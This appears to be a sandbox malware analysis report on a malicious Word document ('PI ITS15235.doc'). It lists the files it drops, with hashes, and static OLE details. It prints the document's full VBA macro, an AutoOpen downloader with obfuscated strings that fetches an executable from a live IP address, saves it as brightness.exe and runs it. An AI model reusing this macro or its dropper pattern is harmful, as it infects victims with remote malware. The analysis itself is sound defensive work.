Size (bytes):	587005
Entropy (8bit):	7.97982343807899
Encrypted:	false
SSDEEP:	12288:7uJf6JY7FoblH0FkRaIHJ4tw0nCdxeJSRrUe9dZA:74f6q7Fw4Ga1twkqxegRoE0
MD5:	C7A8C9CCD0074118575324C6AD87285B
SHA1:	5FEE525990BE478BD0DD9C38BB65315A1140190C
SHA-256:	D228F49F052E95B267E4DAB42958B8A039884A42C03857B3928C48F311FE3DFD
SHA-512:	D10673B750FF592EFB0BD0A5DD5A9260AB1ACB33635D1985DEAB716BAE20C1C7F9195EF6208DA7EAEE8F97C2A6B5832AB9DAA593FDC78A32268CC993E8B7771E
Malicious:	true
Preview:	.....a...{..a..R...L..kJ..d...A.x.3%.>...F..:...;..-.w.,..9.w..?..9.q.a.-E..Q..@..6..32..O.....\,...k.H.y..y.J.s )..,.ug....gz..D..1..)...D..=. p.f.k.!w.@&$....qX.y.B.s_.~.6.z#K..g..OY.j.....y...s.2....i.-..gt..d......7....H[...\|K_.....z\..o#.}.a._..e.....2.t.f..:.t.R.-.....e.....>.....a../...U.%)..N....L./M.X.3W.....1$&.....A...S..U..1...(&${_.....C........ ).[!..Z..y.H.s....:...Xk.-%.._s..-x.2n.[W..L..J_.=n.X..x7j.P..y..=...&$u..K...o.G4..\|...;A.l...7.j....b.p..h X..E..Z.k>..P.x>...;.r.....! ]...o..F..^...-..O..F ..(....R....]E.r&$.d.-....`...<.>y.S...FY.\....?.q.e..M..._.. .h.DE..S.k.9.&&4....m$&6..\|T>.#7..........=.r.}.F......7.(.....q...J..p3..M4.....D....1...i.).x.On......k.c"..9..8"..F...?.l.V..W...?..L.;...\|.S.xS..?.o.?^.u.(..,.p...vN...R.s.S..^.{.`..)...1..f...8......R...a.._..J...y.<C.#9~i!6..M...\..J.P.D..6.....@...W.H>.%0...t...a...X..v.K..S...E%4^..0.i.........DQ.{..gT..p4...Y.h..h&$_....&$).....`...Gy.4.j./..N...P..P...c..Q..

C:\Users\Public\Libraries\Nsltarpn.PIF

Download File

Process:	C:\Windows\SysWOW64\brightness.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1443328
Entropy (8bit):	7.456059208646829
Encrypted:	false
SSDEEP:	24576:EH26y3URPcxdnFQ+MyuPytjUEbnVEeOO1ss45cY2/Ies/apqxHZk:EPauPytNbVEyuHi
MD5:	8D3E16CB3CE3940E87A322FBEEAB419F
SHA1:	5A1E2A3E55B6D8E77F6B038E171034D50A5B97D9
SHA-256:	D3155FCF6F052606BC5F0C293AA6EE43D27BF7990713863E2DD23AB870FBB0BF
SHA-512:	683329D2B9C7AED5C2F03572503C601A866DD3C28C4292BCE4453AFC509458B20D7183729D284D1961FE3B126B8312712FC4903B8A1D41AB9738DC49455F5911
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*................."..........p7.......@....@..............................................@...............................%...p...&......................Lq..................................................................................text............................... ..`.itext.......0...................... ..`.data...`....@... ...&..............@....bss.....6...`.......F...................idata...%.......&...F..............@....tls....4............l...................rdata...............l..............@..@.reloc..Lq.......r...n..............@..B.rsrc....&...p...&..................@..@....................................@..@................................................................................................

C:\Users\Public\Libraries\YKA

Download File

Process:	C:\Windows\SysWOW64\brightness.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:Wy:Wy
MD5:	F04B5F5116702DD78F84BC0691B54352
SHA1:	8B16E4D626345103B2EB030D2F2ED290BA25EFE6
SHA-256:	A7022F0D180485ABD34C3F24D8E49CC248054679E3554EBE524BAFA6C34A8AFE
SHA-512:	0BE2AA109D44DF7E7A535E2F35AA2904ECDCD51C8974A68BB5D092A0107B546D472CE06F9EC70E17CB8B4BBD13627B9645E082AEF523A69BB8D72FC07640E55E
Malicious:	false
Preview:	34..

C:\Users\Public\Libraries\npratlsN.pif

Download File

Process:	C:\Windows\SysWOW64\brightness.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	175800
Entropy (8bit):	6.631791793070417
Encrypted:	false
SSDEEP:	3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
MD5:	22331ABCC9472CC9DC6F37FAF333AA2C
SHA1:	2A001C30BA79A19CEAF6A09C3567C70311760AA4
SHA-256:	BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
SHA-512:	C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: PO#3_RKG367.bat, Detection: malicious, Browse Filename: ENQ-0092025.doc, Detection: malicious, Browse Filename: yxU3AgeVTi.exe, Detection: malicious, Browse Filename: ITT # KRPBV2663 .doc, Detection: malicious, Browse Filename: PI ITS15235.doc, Detection: malicious, Browse Filename: PO#5_Tower_049.bat, Detection: malicious, Browse Filename: HSBC_PAY.SCR.exe, Detection: malicious, Browse Filename: PO_B2W984.com, Detection: malicious, Browse Filename: image.exe, Detection: malicious, Browse Filename: PO_KB#67897.cmd, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............\|..8...,...@...@..@

C:\Users\Public\Nsltarpn.url

Download File

Process:	C:\Windows\SysWOW64\brightness.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Nsltarpn.PIF">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	104
Entropy (8bit):	5.111014478274286
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XMWJREXVLBCSsbx3A+:HRYFVmTWDyzsVLBCSExw+
MD5:	FEE11E949D8E9EFA33E6224D90CD489B
SHA1:	A8898BB3F65B8D65FBB43D2783BD5DCD38DB8122
SHA-256:	DA19F8C2081627D16DFE6E31CCB375670F4C9EF57761722345AD1CF3099CD7DB
SHA-512:	7493EF75ECABEB80E2603DF112D49A16D231F6A2855734BB3E7DF3483B7349B62526778B4159C1537AA87FF0F6352AEDB38F63DF220BC998D597A1A6FC5F991A
Malicious:	true
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Nsltarpn.PIF"..IconIndex=925987..HotKey=51..

C:\Users\Public\NsltarpnF.cmd

Download File

Process:	C:\Windows\SysWOW64\brightness.exe
File Type:	DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	11278
Entropy (8bit):	4.653311201735178
Encrypted:	false
SSDEEP:	192:aMDConKxnlt4iVNt4BIvf6hJyMCdvWr3YGjZq3W4ERrr83hGgPKnrJTFlmwu26:BDWxl+mymfbMAM83WMgguTFlj96
MD5:	F82AEB3B12F33250E404DF6EC873DD1D
SHA1:	BCF538F64457E8D19DA89229479CAFA9C4CCE12F
SHA-256:	23B7417B47C7EFB96FB7CE395E325DC831AB2EE03EADDA59058D31BDBE9C1EA6
SHA-512:	6F9D6DAEED78F45F0F83310B95F47CC0A96D1DB1D7F6C2E2485D7A8ECB04FEE9865EEC3599FEE2D67F3332F68A70059F1A6A40050B93EF44D55632C24D108977
Malicious:	false
Preview:	@echo off..@%..%e%....%c% .%h%.. ......%o%.o.....o..% %.........%o%....r....%f%.o........%f%.....%..s%..... ...%e% r.r.. ...%t%..........% %.... %"%.......%I%..........%F%..%X%o....r..%Q%...o.%=%. ...%s%o..%e%... %t%. o. .% %..%"%..%..%IFXQ%"%..%w%..%S%..... .%c%.....%t%..r.......%=%.%=%....%"%.....%..%IFXQ%"%or.....%d%.........%s%...%b%o.r%m% .....r...%U% .. ..o...%U%.o%u%.... .%r%.........%v%...r..%s%...... ...%%wSct%C%.......%l%..r.%o%....%a%..r....r%"%.....o....%..%IFXQ%"%... .o...%y% %h%r.%R%....

C:\Users\user\AppData\Local\Temp\~DF4C5EFADB8A33A5FF.TMP

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$ ITS15235.doc

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.719445346345922
Encrypted:	false
SSDEEP:	3:KVGl/lilKlRAGlz+ltntn/lfllPX+kT+:KVy/4KDZmntnJ+ky
MD5:	714B323AF3D3CA8C7F04D0B66C564559
SHA1:	11DA82BA536EBD0E9A0719D9DFFDD526B14A5A72
SHA-256:	46A011FE1785910B58A2D3C44B30C2EDB8EAB9362024129408114D7E49D21B85
SHA-512:	D86F7BE5DCF19F6B871C608C30AA510B75E5C74FFE2C990D0C186AB2072632D44ADA2D66C4F24112D0BFB9D0C7419ADC7B011A6E50864E4EE974E057EC45C934
Malicious:	false
Preview:	.user..................................................j.o.n.e.s.....h................)..a.i............................................f..$..}..i.........=.i

C:\Windows \SysWOW64\NETUTILS.dll

Download File

Process:	C:\Windows\SysWOW64\brightness.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	119033
Entropy (8bit):	5.148072354937474
Encrypted:	false
SSDEEP:	1536:BDzIi47phID3zvyDXthSmsVBc2w5jEjISsnEICl7MbiRwRkSYJQ:BDz47pq/6hShc2ljISsnEGRkSYJQ
MD5:	A88976A70AED45F610A032E438A82A95
SHA1:	EC20B0F0D6CCC848C8FFA857AB4E771672DFA4F2
SHA-256:	F3D5A6EBCD8CAB3CC9A98488B23C2DE740C6EF04E33ED317A3E2A047D53D169B
SHA-512:	EC77BB81B9E6DE4AF8A17EB26281D10FC9A05947D588F2EE3680ADA67ED28118FBC9A2D0E63BF0ECC2A4C318555A4F27E72ECF1A530A506E9B4FBF5EFDB4F676
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......g.d........& .....(...$................<a.............................0.......s........ .........................................@....................`..p...............\........................... ...(.................................................... ....'.......(.................. .P`. ...P....@......................@.p.. .......P.......4..............@.P@. ..p....`.......:..............@.0@. ..0....p.......>..............@.0@. ..................................p.. ..@............B..............@.0@. ...............D..............@.0.. ....X............L..............@.@.. ....h............N..............@.`.. ..\............P..............@.0B/4...................R..............@.PB/19..................V..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....

C:\Windows \SysWOW64\svchost.pif

Download File

Process:	C:\Windows\SysWOW64\brightness.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	96448
Entropy (8bit):	5.1636650991276305
Encrypted:	false
SSDEEP:	1536:dhJfbGY/Bn623Kvv0IzGJyyu2xXibswbTYTjULf1YrfspZPgpzF:dhJfbG6B6yKvv0uWyyu2xXibswbQjUjs
MD5:	869640D0A3F838694AB4DFEA9E2F544D
SHA1:	BDC42B280446BA53624FF23F314AADB861566832
SHA-256:	0DB4D3FFDB96D13CF3B427AF8BE66D985728C55AE254E4B67D287797E4C0B323
SHA-512:	6E775CFB350415434B18427D5FF79B930ED3B0B3FC3466BC195A796C95661D4696F2D662DD0E020C3A6C3419C2734468B1D7546712ECEC868D2BBFD2BC2468A7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R#.<p.<p.<p..p.<p..?q.<p..9q.<p..=q.<p.=p..<p..4q.<p..8q.<p...p.<p..>q.<pRich.<p........................PE..d....C~..........."............................@.............................`....................... ...............................................@....... ..<....P...(...P..`.......T...........................0...@...........p...........`....................text.............................. ..`.imrsiv..................................rdata...[.......`..................@..@.data...............................@....pdata..<.... ......................@..@.didat..0....0....... ..............@....rsrc........@.......0..............@..@.reloc..`....P.......@..............@..B........................................................................................................................................................................

C:\Windows\SysWOW64\brightness.exe

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1443328
Entropy (8bit):	7.456059208646829
Encrypted:	false
SSDEEP:	24576:EH26y3URPcxdnFQ+MyuPytjUEbnVEeOO1ss45cY2/Ies/apqxHZk:EPauPytNbVEyuHi
MD5:	8D3E16CB3CE3940E87A322FBEEAB419F
SHA1:	5A1E2A3E55B6D8E77F6B038E171034D50A5B97D9
SHA-256:	D3155FCF6F052606BC5F0C293AA6EE43D27BF7990713863E2DD23AB870FBB0BF
SHA-512:	683329D2B9C7AED5C2F03572503C601A866DD3C28C4292BCE4453AFC509458B20D7183729D284D1961FE3B126B8312712FC4903B8A1D41AB9738DC49455F5911
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*................."..........p7.......@....@..............................................@...............................%...p...&......................Lq..................................................................................text............................... ..`.itext.......0...................... ..`.data...`....@... ...&..............@....bss.....6...`.......F...................idata...%.......&...F..............@....tls....4............l...................rdata...............l..............@..@.reloc..Lq.......r...n..............@..B.rsrc....&...p...&..................@..@....................................@..@................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: GRACE, Template: Normal.dotm, Last Saved By: GRACE, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Jan 13 01:17:00 2025, Last Saved Time/Date: Mon Jan 13 01:17:00 2025, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
Entropy (8bit):	7.058129864340311
TrID:	Microsoft Word document (32009/1) 54.23% Microsoft Word document (old ver.) (19008/1) 32.20% Generic OLE2 / Multistream Compound File (8008/1) 13.57%
File name:	PI ITS15235.doc
File size:	146'944 bytes
MD5:	c8e60db8174345c243187675d4c760de
SHA1:	34bdd0903708f1ab747cbb45a6a292517e1df83e
SHA256:	94519fee9d47fd0262d1dd50e0bf20ea7cb0962b3a1e1de217c5f462b0633fab
SHA512:	ae643f21123ef8514bf4ac405f0f385534b7d87fa681669d8bc276b81cecfce0e4660843aa442ec52882ca66e8f7cf80c3952bd0fc039ac5dc0d8047b970e769
SSDEEP:	1536:L7dgmjjy2lQkySTUb2roegTK+g9WomfaQjSqttJnkL5mS9kBwNR42q8Z:LZPjbTU+J799IjSqtteL5N9kBF2
TLSH:	D0E3C447A9448B47E03493B5BE435FAD2F197E0CA9866AEF11273E9B3D302324D4E16D
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	35e1cc889a8a8599

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "PI ITS15235.doc"

Indicators

Has Summary Info:
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Code Page:	1252
Title:
Subject:
Author:	GRACE
Keywords:
Comments:
Template:	Normal.dotm
Last Saved By:	GRACE
Revion Number:	2
Total Edit Time:	0
Create Time:	2025-01-13 01:17:00
Last Saved Time:	2025-01-13 01:17:00
Number of Pages:	1
Number of Words:	0
Number of Characters:	1
Creating Application:	Microsoft Office Word
Security:	0

Document Summary

Document Code Page:	1252
Number of Lines:	1
Number of Paragraphs:	1
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	983040

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 4807

General
Stream Path:	Macros/VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	4807
Data ASCII:	. . . . . . . . V . . . . . . . . . ] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S " . . . . S . . . . . S " . . . . . < . . . . . . . . . . ( . 1 . N . o . r . m . a . l . . . T . h . i . s
Data Raw:	01 16 01 00 01 f0 00 00 00 56 05 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff 5d 05 00 00 81 0f 00 00 00 00 00 00 01 00 00 00 af 08 89 e1 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
 
Dim xHttp:
'this is a comment



Set xHttp = CreateObject("M" & "S" & "X" & "M" & "L" & "2" & "." & "S" & "er" & "ver" & "XM" & "LH" & "TTP")
'this is a comment
Dim bStrm:
'this is a comment
Set bStrm = CreateObject("Ad" & "od" & "b.S" & "tr" & "ea" & "m")



Dim nirm1
nirm1 = "h"
Dim nirm2
nirm2 = "t"
Dim nirm3
nirm3 = "t" & "p:/" & "/147.124.216.113/albt"
Dim nirm4
nirm4 = "."
Dim nirm5
nirm5 = "e"
Dim nirm6
nirm6 = "x"
Dim nirm7
nirm7 = "e"



Dim plpl
plpl = nirm1 & nirm2 & nirm3 & nirm4 & nirm5 & nirm6 & nirm7

'this is a comment
xHttp.Open "GET", plpl, False
xHttp.Send




 
With bStrm
 .Type = 1
.Open
 .write xHttp.responsebody
 
 'this is a comment
 
Dim monu1
 monu1 = "brightness"
 Dim monu2
 monu2 = "."
 'this is a comment
 Dim monu3
 monu3 = "e"
 'this is a comment
 Dim monu4
 monu4 = "x"
 'this is a comment
 Dim monu5
 monu5 = "e"
 'this is a comment
 Dim monu6
 monu6 = monu1 & monu2 & monu3 & monu4 & monu5
 
 
 .savetofile monu6, 2


Dim parveen1
Dim parveen2
Dim parveen3
Dim parveen4
Dim praveen1
praveen1 = """brightness"
Dim praveen2
praveen2 = "."
'this is a comment
Dim praveen3
praveen3 = "e"
'this is a comment
Dim praveen4
praveen4 = "x"
'this is a comment
Dim praveen5
praveen5 = "e"""
'this is a comment



Dim praveen6
praveen6 = praveen1 & praveen2 & praveen3 & praveen4 & praveen5
 


End With
 
Shell (praveen6)
 
End Sub

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.235956365095031
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	4096
Entropy:	0.24379920956187054
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	4096
Entropy:	0.4501471290353457
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G R A C E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 ec 00 00 00 09 00 00 00 fc 00 00 00

Stream Path: 1Table, File Type: data, Stream Size: 7011

General
Stream Path:	1Table
CLSID:
File Type:	data
Stream Size:	7011
Entropy:	5.872404663492899
Base64 Encoded:	True
Data ASCII:	. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
Data Raw:	0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Data, File Type: dBase III DBT, version number 0, next free block index 113648, 1st item "TRC", Stream Size: 113648

General
Stream Path:	Data
CLSID:
File Type:	dBase III DBT, version number 0, next free block index 113648, 1st item "TRC"
Stream Size:	113648
Entropy:	7.649735788267893
Base64 Encoded:	True
Data ASCII:	. . D . d . . . . . . . . . . . . . . . . . . . . . / = ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . s . . > . . . . . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . P . i . c . t . u . r . e . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . R . . , . . . . Z . . 7 J 2 9 ( . . . . . . . . D . . . . . . F . . . . Z . . 7 J 2 9 ( . . J F I F . . . . . . . . . I C C _ P R O F I L E . . . . . . . . . . . . . . . m n
Data Raw:	f0 bb 01 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 2f e0 3d 60 03 ca 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 70 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 73 00 0b f0 3e 00 00 00 7f 00 80 00 e1 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 374

General
Stream Path:	Macros/PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	374
Entropy:	5.333346828642331
Base64 Encoded:	True
Data ASCII:	I D = " { B 2 0 9 1 B A 2 - B 3 B B - 4 A A 9 - 8 C E 7 - E D 9 6 0 D D 0 8 7 1 9 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C F C D C 8 A 9 3 8 5 B B 1 5 F B 1 5 F B 1 5 F B 1 5 F " . . D P B = " 4 C 4 E 4 B 2 8 B 5 A 4 B 6 A 4 B 6 A 4 " . . G C = " C 9 C B C E D 3 C F D 3 C F 2 C " . . . . [ H o s t E x t e n d e r I n f o ]
Data Raw:	49 44 3d 22 7b 42 32 30 39 31 42 41 32 2d 42 33 42 42 2d 34 41 41 39 2d 38 43 45 37 2d 45 44 39 36 30 44 44 30 38 37 31 39 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 41

General
Stream Path:	Macros/PROJECTwm
CLSID:
File Type:	data
Stream Size:	41
Entropy:	3.0773844850752607
Base64 Encoded:	False
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2910

General
Stream Path:	Macros/VBA/_VBA_PROJECT
CLSID:
File Type:	data
Stream Size:	2910
Entropy:	4.356611383898817
Base64 Encoded:	False
Data ASCII:	a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o
